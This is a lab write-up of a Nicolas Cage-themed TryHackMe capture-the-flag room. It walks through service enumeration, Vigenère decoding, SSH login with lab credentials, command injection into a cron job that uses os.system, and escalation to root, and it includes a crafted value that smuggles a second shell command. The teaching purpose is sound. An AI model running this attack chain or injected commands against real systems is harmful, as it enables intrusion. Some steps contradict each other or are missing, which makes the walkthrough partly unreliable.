Break Out The Cage (CTF Challenge - THM)


INTRO

In this TryHackMe room, Break Out The Cage, we step into a Nicolas Cage-themed CTF that layers enumeration, classical cryptography, and privilege escalation into a full attack chain. The challenge begins with a fan site for the actor himself and ends with root access — uncovering a conspiracy between his agent and a shadowy actors' guild along the way.

The room covers reconnaissance across three services (HTTP, FTP, SSH), extracting and decoding a Vigenère-encrypted message from FTP, brute-forcing SSH credentials using a custom wordlist, and exploiting a cron job running a Python script vulnerable to command injection via os.system(). Privilege escalation to root is achieved by decoding a second Vigenère cipher found in cage's email backup.

Investigate!

Let's find out what his agent is up to....

Answer the questions below

Reconnaissance & Enumeration

nmap -p- -sV IP_Address

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
curl http://IP_Address
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
	<title>Nicholas Cage Stories</title>
	<link rel="stylesheet" href="style.css" type="text/css" charset="utf-8" />
</head>

<body>
<div id="wrapper">
	<div id="body">
		<div id="body-top">
			<div id="body-bot">
				<div id="header">
					<img src="images/rage_cage.png" width="332" height="453" alt="Pic 1" id="person" />
					<h1><img src="images/logo.gif" width="259" height="107" alt="My Diary" /></h1>
					 <div id="about">
					  <p><span class="first-letter">T</span>his is my personal website I host from my home in, well wouldn't YOU LIKE TO KNOW?!?.</p>
	  	     	<p>My son Weston set it up for my, the boy's always been good with technology since I paid for an MIT dropout to teach him..</p>
			    	<p>I post from time to time on here about how lifes going, ya know the ups the downs the mess me arounds. But hey! I'm the Cage?
							am I right? huh!?</p>
				    <p>My agent is currently on holiday in Hawaii so not taking calls on up coming films and book signings</p>
					 </div>

					<div class="clear"></div>
					<ul>
						<li><a href="#">Home</a></li>
						<li><a href="#">About me</a></li>
						<li><a href="#">Passion</a></li>
						<li><a href="#">Hobbies</a></li>
						<li><a href="#">Profession</a></li>
						<li><a href="#">Collection</a></li>
						<li><a href="#">Contact</a></li>
					</ul>
				</div>
				<div id="tray">
					<div id="tray-left">
						<h2><img src="images/h_hobbies.gif" width="70" height="20" alt="H Hobbies" /></h2>
						<img src="images/pic_2.jpg" width="65" height="87" alt="Pic 2" class="left" />
						<p>Avid comic book fan, previous owner of a pet octopus.</p>
			    	<p>I also do films in my spare time</p>
					</div>
					<div id="tray-right">
						<h2><img src="images/h_collections.gif" width="90" height="20" alt="H Collections" /></h2>
						<img src="images/pic_3.jpg" width="299" height="87" alt="Pic 3" />
					</div>
					<div class="clear"></div>
				</div>
				<div id="footer">
					<div id="footer-right">
						<i>"I think I jump around more when I'm alone" - Nicholas Cage</i>
					</div>
				</div>
			</div>
		</div>
	</div>
</div>


</body>
</html>
gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
/.html                (Status: 403) [Size: 278]
/.hta.html            (Status: 403) [Size: 278]
/.htaccess.html       (Status: 403) [Size: 278]
/.htaccess.txt        (Status: 403) [Size: 278]
/.hta.txt             (Status: 403) [Size: 278]
/.hta.php             (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/.htaccess.php        (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd.php        (Status: 403) [Size: 278]
/.htpasswd.txt        (Status: 403) [Size: 278]
/.htpasswd.html       (Status: 403) [Size: 278]
/contracts            (Status: 301) [Size: 318] [--> http://IP_Address/contracts/]
/html                 (Status: 301) [Size: 313] [--> http://IP_Address/html/]
/images               (Status: 301) [Size: 315] [--> http://IP_Address/images/]
/index.html           (Status: 200) [Size: 2453]
/index.html           (Status: 200) [Size: 2453]
/scripts              (Status: 301) [Size: 316] [--> http://IP_Address/scripts/]
/server-status        (Status: 403) [Size: 278]
curl -s http://IP_Address/scripts/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /scripts</title>
 </head>
 <body>
<h1>Index of /scripts</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="CowardlyGoblin">CowardlyGoblin</a></td><td align="right">2020-05-18 17:55  </td><td align="right">7.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="ForgetfulThug">ForgetfulThug</a></td><td align="right">2020-05-18 17:55  </td><td align="right">7.2K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="MeanLion">MeanLion</a></td><td align="right">2020-05-18 17:55  </td><td align="right">7.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="SelfishGhost">SelfishGhost</a></td><td align="right">2020-05-18 17:55  </td><td align="right">7.0K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="TactlessTiger">TactlessTiger</a></td><td align="right">2020-05-18 17:55  </td><td align="right">7.0K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at IP_Address Port 80</address>
</body></html>
root@ip-10-130-110-224:~# curl -s http://IP_Address/html/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /html</title>
 </head>
 <body>
<h1>Index of /html</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at IP_Address Port 80</address>
</body></html>
curl -s http://IP_Address/scripts/CowardlyGoblin | head -20
Cowardly Goblin
A Screenplay by Mr Pseudonym
EXT. A GREASY DINER - AFTERNOON

Virtuous nurse MADAME KIMBERLY GOBBLE is arguing with virtuous private detective DI MOLLY SNOZCUMBER. KIMBERLY tries to hug MOLLY but she shakes her off.

KIMBERLY
Please Molly, don't leave me.
MOLLY
I'm sorry Kimberly, but I'm looking for somebody a bit more brave. Somebody who faces her fears head on, instead of running away.
KIMBERLY
I am such a person!
MOLLY frowns.

MOLLY
I'm sorry, Kimberly. I just don't feel excited by this relationship anymore.
MOLLY leaves.

KIMBERLY sits down, looking defeated.
for f in CowardlyGoblin ForgetfulThug MeanLion SelfishGhost TactlessTiger; do
>   curl -s http://IP_Address/scripts/$f
> done | tr ' ' '\n' | tr '[:upper:]' '[:lower:]' | sort -u > wordlist.txt

wc -l wordlist.txt
817 wordlist.txt

I looked through the differently titled poems and quotes (the text is a bit long, so I couldn't attach it here); all of it was useful when hunting for the password and the flags.

What is Weston's password?

ftp IP_Address

ls -la

get dad_tasks
UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds

Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl
  • Used dcode.fr to decode the Vigenère cipher that was extracted from FTP
Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.

In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes
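
Added example, not part of the original write-up: because the first line of dad_tasks appears above both encrypted and decoded, the Vigenère key can be recovered by subtracting plaintext from ciphertext letter by letter, which is why this cipher gives no real protection to a stored password. The two strings are copied from the listings above; the function names are this example's own.

```python
# Added example: known-plaintext key recovery against the dad_tasks Vigenère text.
# CIPHERTEXT and CRIB are copied from the write-up; all function names are illustrative.

CIPHERTEXT = (
    "Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!\n"
    "Sfw. Kajnmb xsi owuowge"
)
# Decoded first line as shown in the write-up; used here as the known plaintext (crib).
CRIB = "Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!"


def key_stream(ciphertext, plaintext):
    """Key letter used at each alphabetic position: k = (c - p) mod 26."""
    stream = []
    for c, p in zip(ciphertext, plaintext):
        if c.isalpha() and p.isalpha():
            stream.append(chr((ord(c.lower()) - ord(p.lower())) % 26 + ord("a")))
    return "".join(stream)


def shortest_period(stream):
    """Smallest n for which the stream is a repetition of its first n letters."""
    for n in range(1, len(stream) + 1):
        if all(ch == stream[i % n] for i, ch in enumerate(stream)):
            return n
    return len(stream)


def recover_key(ciphertext, crib):
    """Derive the repeating key from a ciphertext and the plaintext of its start."""
    stream = key_stream(ciphertext, crib)
    return stream[:shortest_period(stream)]


def decrypt(ciphertext, key):
    """Vigenère decryption that keeps case and passes non-letters through."""
    out, ki = [], 0
    for c in ciphertext:
        if c.isalpha():
            base = ord("A") if c.isupper() else ord("a")
            shift = ord(key[ki % len(key)].lower()) - ord("a")
            out.append(chr((ord(c) - base - shift) % 26 + base))
            ki += 1  # the key only advances on letters
        else:
            out.append(c)
    return "".join(out)


if __name__ == "__main__":
    key = recover_key(CIPHERTEXT, CRIB)
    print("recovered key:", key)
    # The second line was not part of the crib, yet it decrypts with the same key.
    print(decrypt(CIPHERTEXT, key))
```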

What's the user flag?

ssh weston@IP_Address

weston:Mydadisghostrideraintthatcoolnocausehesonfirejokes

ls -la
total 16
drwxr-xr-x 4 weston weston 4096 May 26  2020 .
drwxr-xr-x 4 root   root   4096 May 26  2020 ..
lrwxrwxrwx 1 weston weston    9 May 26  2020 .bash_history -> /dev/null
drwx------ 2 weston weston 4096 May 26  2020 .cache
drwx------ 3 weston weston 4096 May 26  2020 .gnupg
                                                                               
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:33:01 
                                                                               
l guess they don't call you the Executioner for nothing! And you sign my kid's autograph! \u2014 Snake Eyes
                                                                               
find / -type f -name user.txt 2>/dev/null
weston@national-treasure:~$ find / -type f -name user.txt 2>/dev/null
weston@national-treasure:~$ ls /home
cage  weston
                                                                               
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:36:01 
                                                                               
Honey? Uh... You wanna know who really killed JFK? \u2014 The Rock
  • Tried running sudo -l and found /usr/bin/bees; checked GTFOBins, but this wasn't helpful
sudo -l
[sudo] password for weston: 

Sorry, try again.
[sudo] password for weston: 
Sorry, try again.
[sudo] password for weston: 
Matching Defaults entries for weston on national-treasure:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User weston may run the following commands on national-treasure:
    (root) /usr/bin/bees
                                                                               
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:39:01 
                                                                               
Bangers and mash! Bubbles and squeak! Smoked eel pie! Haggis! \u2014 National Treasure 2: Book Of Secrets
                                                                               
bee eval '...'

Command 'bee' not found, did you mean:

Try: apt install <deb name>

weston@national-treasure:~$ /usr/bin/bee eval '...'
-bash: /usr/bin/bee: No such file or directory
weston@national-treasure:~$ /usr/bin/bees eval '...'
                                                                               
Broadcast message from weston@national-treasure (pts/0) (Fri Mar 27 13:40:40 20
                                                                               
AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!!

                                                                               
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:48:01 
                                                                               
I'll be taking these Huggies and whatever cash ya got. \u2014 Raising Arizona
                                                                               
cd /opt
weston@national-treasure:/opt$ ls -la
total 12
drwxr-xr-x  3 root root 4096 May 25  2020 .
drwxr-xr-x 24 root root 4096 May 26  2020 ..
drwxr-xr-x  3 cage cage 4096 May 26  2020 .dads_scripts
weston@national-treasure:/opt$ cat .dads_scripts
cat: .dads_scripts: Is a directory
weston@national-treasure:/opt$ cd .dads_scripts
weston@national-treasure:/opt/.dads_scripts$ ls -la
total 16
drwxr-xr-x 3 cage cage 4096 May 26  2020 .
drwxr-xr-x 3 root root 4096 May 25  2020 ..
drwxrwxr-x 2 cage cage 4096 May 25  2020 .files
-rwxr--r-- 1 cage cage  255 May 26  2020 spread_the_quotes.py
weston@national-treasure:/opt/.dads_scripts$ python3 spread_the_qoutes.py
python3: can't open file 'spread_the_qoutes.py': [Errno 2] No such file or directory
weston@national-treasure:/opt/.dads_scripts$ cat .files
cat: .files: Is a directory
weston@national-treasure:/opt/.dads_scripts$ cd .files
weston@national-treasure:/opt/.dads_scripts/.files$ ls -la
total 16
drwxrwxr-x 2 cage cage 4096 May 25  2020 .
drwxr-xr-x 3 cage cage 4096 May 26  2020 ..
-rwxrw---- 1 cage cage 4204 May 25  2020 .quotes
weston@national-treasure:/opt/.dads_scripts/.files$ cat .qoutes
cat: .qoutes: No such file or directory
weston@national-treasure:/opt/.dads_scripts/.files$ cat /.qoutes
cat: /.qoutes: No such file or directory
weston@national-treasure:/opt/.dads_scripts/.files$ cat .quotes
"That's funny, my name's Roger. Two Rogers don't make a right!" \u2014 Gone in Sixty Seconds
"Did I ever tell ya that this here jacket represents a symbol of my individuality, and my belief in personal freedom?" \u2014 Wild at Heart
"Well, I'm one of those fortunate people who like my job, sir. Got my first chemistry set when I was seven, blew my eyebrows off, we never saw the cat again, been into it ever since." \u2014 The Rock
"Put... the bunny... back... in the box." \u2014 Con Air
"Sorry boss, but there's only two men I trust. One of them's me. The other's not you." \u2014 Con Air
"What's in the bag? A shark or something?" \u2014 The Wicker Man
"Only if it's a noun, and the words have equal weight. Like, Homeland Security. If it's a participle modifying the first word, then... you better keep it lower case." \u2014 Seeking Justice
"What do you think I'm gonna do? I'm gonna save the ' ****** day!" \u2014 Con Air
"Guns and wine. Naughty priests." \u2014 Ghost Rider: Spirit of Vengeance
Hey! My mama lives in a trailer!" \u2014 Con Air
\u201cKilling me won\u2019t bring back your *** **** honey!\u201d \u2014 The Wicker Man
"Well, Baby-O, it's not exactly mai-thais and yatzee out here but... let's do it!" \u2014 Con Air
\u201cYou'll be seeing a lot of changes around here. Papa's got a brand new bag.\u201d \u2014 Face/Off
"Shoot him again... His soul's still dancing." \u2014 Bad Lieutenant: Port Of Call
"OH, NO! NOT THE BEES! NOT THE BEES! AAAAAHHHHH! OH, THEY'RE IN MY EYES! MY EYES! AAAAHHHHH! AAAAAGGHHH!" \u2014 The Wicker Man
\u201cTool up, honey bunny. It's time to get bad guys.\u201d \u2014 Kick-Ass
"Honey? Uh... You wanna know who really killed JFK?" \u2014 The Rock
\u201cI saw you and you saw me, don\u2019t pretend like you don\u2019t know who I am girly man\u201d \u2014 Snake Eyes
"You just put it in the right file, according to alphabetical order! Y'know A, B , C, D, E, F, G!" \u2014 Vampire's Kiss
"Everything I take is prescription - except for the heroin." \u2014 Bad Lieutenant: Port Of Call
"Bangers and mash! Bubbles and squeak! Smoked eel pie! Haggis!" \u2014 National Treasure 2: Book Of Secrets
"l guess they don't call you the Executioner for nothing! And you sign my kid's autograph!" \u2014 Snake Eyes
"Listen, I think we got started off on the wrong foot. I'm Stan Goodspeed, FBl. Uh - Let's talk music. Do you like the Elton John song, "Rocket Man"?" \u2014 The Rock
"Well, today's your lucky day, 'cause I brought an eagle." \u2014 The Sorcerer's Apprentice
"Release the baby!" \u2014 The Croods
"I love pressure. I eat it for breakfast." \u2014 The Rock
"I just remembered, I have to go into town to pick up your anti-itch cream." \u2014 The Sorcerer's Apprentice
"What are these ****** iguanas doing on my coffee table?" \u2014 Bad Lieutenant: Port Of Call
"I mean it, honey, the world is being Fed-exed to hell in a hand cart." \u2014 The Rock
"Black, French, alcoholic priest, kind of a ****. Why, do you know him?" \u2014 Ghost Rider: Spirit of Vengeance
"I never disrobe before gunplay." \u2014 Drive Angry
"Hey. Dirtbag." \u2014 Ghost Rider
"I'll be taking these Huggies and whatever cash ya got." \u2014 Raising Arizona
"What's that like? What's it taste like? Describe it like Hemingway." \u2014 City of Angels
"If you dress like Halloween, ghouls will try to get in your pants." \u2014 Face/Off
"I told you I'd share my ticket. I never planned on sharing my heart. Maybe I could get lucky twice today." \u2014 It Could Happen to You
"I'm a vampire! I'm a vampire! I'm a vampire!" \u2014 Vampire's Kiss
"If I were to send you flowers where would I... no, let me rephrase that. If I were to let you suck my tongue, would you be grateful?" \u2014 Face/Off
"People don't throw things at me any more. Maybe because I carry a bow around." \u2014 The Weather Man
"You'll be seeing a lot of changes around here. Papa's got a brand new bag." \u2014 Face/Off
"Here's something that if you want your father to think you're not a silly ****, don't slap a guy across the face with a glove because if you do that, that's what he will think. Unless you're a noble man or something in the nineteenth century. Which I am not." \u2014 The Weather Man
"It's like we're on two different channels now. I'm CNN and she's the Home Shopping Network." \u2014 It Could Happen to You
                                                                               
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:51:01 
                                                                               
Well, I'm one of those fortunate people who like my job, sir. Got my first chemistry set when I was seven, blew my eyebrows off, we never saw the cat again, been into it ever since. \u2014 The Rock
                                                                               
                                                                               
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:54:01 
                                                                               
Guns and wine. Naughty priests. \u2014 Ghost Rider: Spirit of Vengeance
  • Reading this file, we finally get the user flag
cat /opt/.dads_scripts/spread_the_quotes.py
#!/usr/bin/env python

#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import random

lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)
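
Added example (not the room's script and not the author's code): it passes one constructed quotes-file line through the same string-concatenation pattern as spread_the_quotes.py and through an argument-list call, and checks the file modes shown in the .files listing above. `echo` stands in for `wall` so nothing is broadcast; the function names and the sample line are this example's own.

```python
import os
import stat
import subprocess
import tempfile

# Assumption: `echo` replaces `wall` so the demo prints instead of broadcasting.
CMD = "echo"

# Constructed quotes-file line: a quote, a shell separator, and a harmless marker command.
CRAFTED = '"Put... the bunny... back... in the box."; echo MARKER-ran-as-separate-command'


def broadcast_shell(quote):
    """Same shape as os.system("wall " + quote): /bin/sh parses the whole line."""
    return subprocess.run(CMD + " " + quote, shell=True,
                          capture_output=True, text=True).stdout


def broadcast_argv(quote):
    """No shell involved: the line is a single argument, so ';' is just text.
    (wall also reads the message from stdin, which avoids a leading '-' being
    taken as an option.)"""
    return subprocess.run([CMD, quote], capture_output=True,
                          text=True, check=True).stdout


def writable_beyond_owner(path):
    """True if group or others can modify the file or its parent directory."""
    for p in (path, os.path.dirname(os.path.abspath(path))):
        if os.stat(p).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            return True
    return False


def permission_demo():
    """Recreate the modes from the listing (.files 775, .quotes 760), then tighten."""
    with tempfile.TemporaryDirectory() as d:
        quotes = os.path.join(d, ".quotes")
        open(quotes, "w").close()
        os.chmod(d, 0o775)
        os.chmod(quotes, 0o760)
        before = writable_beyond_owner(quotes)
        os.chmod(d, 0o755)
        os.chmod(quotes, 0o640)
        after = writable_beyond_owner(quotes)
        return before, after


if __name__ == "__main__":
    print("shell string :", broadcast_shell(CRAFTED).splitlines())
    print("argument list:", broadcast_argv(CRAFTED).splitlines())
    print("input file writable beyond owner (before, after):", permission_demo())
```

Both fixes matter for a script run from cron: the argument-list call removes the shell from the path, and the mode check catches an input file that accounts other than the job's owner can edit.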

What's the root flag?

ls -la /home/cage/email_backup/
total 20
drwxrwxr-x 2 cage cage 4096 May 25  2020 .
drwx------ 7 cage cage 4096 May 26  2020 ..
-rw-rw-r-- 1 cage cage  431 May 25  2020 email_1
-rw-rw-r-- 1 cage cage  733 May 25  2020 email_2
-rw-rw-r-- 1 cage cage  745 May 25  2020 email_3
b-4.4$ pwd
/tmp
b-4.4$ cd /home/cage/email_backup
b-4.4$ cat email_1
From - SeanArcher@BigManAgents.com
To - Cage@nationaltreasure.com

Hey Cage!

There's rumours of a Face/Off sequel, Face/Off 2 - Face On. It's supposedly only in the
planning stages at the moment. I've put a good word in for you, if you're lucky we 
might be able to get you a part of an angry shop keeping or something? Would you be up
for that, the money would be good and it'd look good on your acting CV.

Regards

Sean Archer
b-4.4$ cat email_2
From - Cage@nationaltreasure.com
To - SeanArcher@BigManAgents.com

Dear Sean

We've had this discussion before Sean, I want bigger roles, I'm meant for greater things.
Why aren't you finding roles like Batman, The Little Mermaid(I'd make a great Sebastian!),
the new Home Alone film and why oh why Sean, tell me why Sean. Why did I not get a role in the
new fan made Star Wars films?! There was 3 of them! 3 Sean! I mean yes they were terrible films.
I could of made them great... great Sean.... I think you're missing my true potential.

On a much lighter note thank you for helping me set up my home server, Weston helped too, but
not overally greatly. I gave him some smaller jobs. Whats your username on here? Root?

Yours

Cage
b-4.4$ cat email_3
From - Cage@nationaltreasure.com
To - Weston@nationaltreasure.com

Hey Son

Buddy, Sean left a note on his desk with some really strange writing on it. I quickly wrote
down what it said. Could you look into it please? I think it could be something to do with his
account on here. I want to know what he's hiding from me... I might need a new agent. Pretty
sure he's out to get me. The note said:

haiinspsyanileph

The guy also seems obsessed with my face lately. He came him wearing a mask of my face...
was rather odd. Imagine wearing his ugly face.... I wouldnt be able to FACE that!! 
hahahahahahahahahahahahahahahaahah get it Weston! FACE THAT!!!! hahahahahahahhaha
ahahahhahaha. Ahhh Face it... he's just odd. 

Regards

The Legend - Cage
python3 -c "
> def vd(ct, key):
>     res=[]; ki=0; key=key.lower()
>     for c in ct:
>         if c.isalpha():
>             s=ord(key[ki%len(key)])-ord('a')
>             res.append(chr((ord(c.lower())-ord('a')-s)%26+ord('a')))
>             ki+=1
>         else: res.append(c)
>     return ''.join(res)
> 
> print(vd('haiinspsyanileph', 'faceoff'))
> "
cageznknyyjugzkh

Before accessing the root user, we were able to access the email backup folder that had three emails, but none of them had the root flag. It helped us get a password, which eventually helped us escalate privileges and access the email backup that has the root flag.

weston@national-treasure:/home/cage$ su root
Password: 
root@national-treasure:/home/cage# ls -la
total 56
drwx------ 7 cage cage 4096 May 26  2020 .
drwxr-xr-x 4 root root 4096 May 26  2020 ..
lrwxrwxrwx 1 cage cage    9 May 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 cage cage  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 cage cage 3771 Apr  4  2018 .bashrc
drwx------ 2 cage cage 4096 May 25  2020 .cache
drwxrwxr-x 2 cage cage 4096 May 25  2020 email_backup
drwx------ 3 cage cage 4096 May 25  2020 .gnupg
drwxrwxr-x 3 cage cage 4096 May 25  2020 .local
-rw-r--r-- 1 cage cage  807 Apr  4  2018 .profile
-rw-rw-r-- 1 cage cage   66 May 25  2020 .selected_editor
drwx------ 2 cage cage 4096 May 26  2020 .ssh
-rw-r--r-- 1 cage cage    0 May 25  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 cage cage  230 May 26  2020 Super_Duper_Checklist
-rw------- 1 cage cage 6761 May 26  2020 .viminfo
                                                                               
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 14:24:01 
                                                                               
quotes
                                                                               
python -c 'import pty; pty.spawn("/bin/bash")'
root@national-treasure:/home/cage# sudo su
root@national-treasure:/home/cage# cd /root
root@national-treasure:~# ls -la
total 52
drwx------  8 root root  4096 May 26  2020 .
drwxr-xr-x 24 root root  4096 May 26  2020 ..
lrwxrwxrwx  1 root root     9 May 26  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  3106 Apr  9  2018 .bashrc
drwx------  2 root root  4096 May 26  2020 .cache
drwxr-xr-x  2 root root  4096 May 25  2020 email_backup
drwx------  3 root root  4096 May 26  2020 .gnupg
drwxr-xr-x  3 root root  4096 May 25  2020 .local
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
drwx------  2 root root  4096 May 25  2020 .ssh
drwxr-xr-x  2 root root  4096 May 26  2020 .vim
-rw-------  1 root root 11692 May 26  2020 .viminfo
root@national-treasure:~# cd email_backup
root@national-treasure:~/email_backup# ls -la
total 16
drwxr-xr-x 2 root root 4096 May 25  2020 .
drwx------ 8 root root 4096 May 26  2020 ..
-rw-r--r-- 1 root root  318 May 25  2020 email_1
-rw-r--r-- 1 root root  414 May 25  2020 email_2
root@national-treasure:~/email_backup# cat email_1
From - SeanArcher@BigManAgents.com
To - master@ActorsGuild.com

Good Evening Master

My control over Cage is becoming stronger, I've been casting him into worse and worse roles.
Eventually the whole world will see who Cage really is! Our masterplan is coming together
master, I'm in your debt.

Thank you

Sean Archer
root@national-treasure:~/email_backup# cat email_2
From - master@ActorsGuild.com
To - SeanArcher@BigManAgents.com

Dear Sean

I'm very pleased to here that Sean, you are a good disciple. Your power over him has become
strong... so strong that I feel the power to promote you from disciple to crony. I hope you
don't abuse your new found strength. To ascend yourself to this level please use this code:

THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}

Thank you

Sean Archer

CONCLUSION

This room was a fun reminder that enumeration pays off in layers — the web directories, FTP file, and broadcaster cron job each revealed a piece of the puzzle that only made sense in context of the others. A few key takeaways:

  • Wordlist generation matters: the screenplay files looked like noise but contained the SSH password embedded in a decoded Vigenère message — always read what you find before dismissing it.

  • os.system() with unsanitised input is a classic code injection sink: the cron job calling wall + quote with no sanitisation meant writing a payload to the quotes file was sufficient for lateral movement.

  • Group membership is a privesc vector: running sudo /usr/bin/bees added us to the cage group, granting write access to .quotes — a non-obvious but realistic escalation path.

  • Classical ciphers still show up in CTFs: recognising the Vigenère pattern and identifying the key from contextual clues ("FACE that!!") saved significant time over brute-forcing.